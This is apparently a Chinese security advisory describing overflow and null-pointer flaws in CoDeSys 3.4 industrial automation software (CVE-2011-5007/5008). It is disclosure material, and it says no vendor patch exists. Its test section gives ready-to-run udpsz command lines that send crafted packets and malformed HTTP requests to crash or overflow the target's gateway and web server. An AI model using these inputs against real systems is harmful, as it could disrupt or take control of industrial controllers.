发布日期：2011-11-29
更新日期：2011-11-30

受影响系统：

3S GmbH CoDeSys 3.4 SP4 Patch 2

描述：

---

BUGTRAQ  ID: 50849
CVE ID: CVE-2011-5007,CVE-2011-5008

CoDeSys Automation Suite是工业自动化技术综合软件工具。

CoDeSys在实现上存在缓冲区溢出和整数溢出漏洞，攻击者可利用这些漏洞执行任意代码。

1）GatewayService整数溢出；

2）CmpWebServer栈溢出；

3）CmpWebServer内容长度空指针；

4）CmpWebServer无效HTTP请求空指针；

5）CmpWebServer文件夹创建；

<*来源：Luigi Auriemma （aluigi@pivx.com）
  
  链接：http://aluigi.altervista.org/adv/codesys_1-adv.txt
        http://www.exploit-db.com/exploits/18187/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://aluigi.org/testz/udpsz.zip

A]
  udpsz -T -b 0x61 -X 0xc 32 l 0xfffffff2 -1 -l 0 -D SERVER 1217 0xffff

B]
  udpsz -c "GET /" 0 -b a -c "\\a HTTP/1.0\r\n\r\n" -1 -T -D SERVER 8080 8192

C]
  udpsz -T -c "POST / HTTP/1.0\r\nContent-Length: 4294967295\r\n\r\n" SERVER 8080 -1

D]
  udpsz -T -c "BLAH / HTTP/1.0\r\n\r\n" SERVER 8080 -1

E]
  udpsz -T -c "GET /dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
  udpsz -T -c "GET /dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
  udpsz -T -c "GET /dir\\dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
  udpsz -T -c "GET /dir\\dir\\dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
  udpsz -T -c "GET /dir\\dir\\dir\\dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1

建议：

---

厂商补丁：

3S
--
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.3s-software.com/index.shtml?en_CoDeSysV3_en

浏览次数：2316
严重程度：0（网友投票）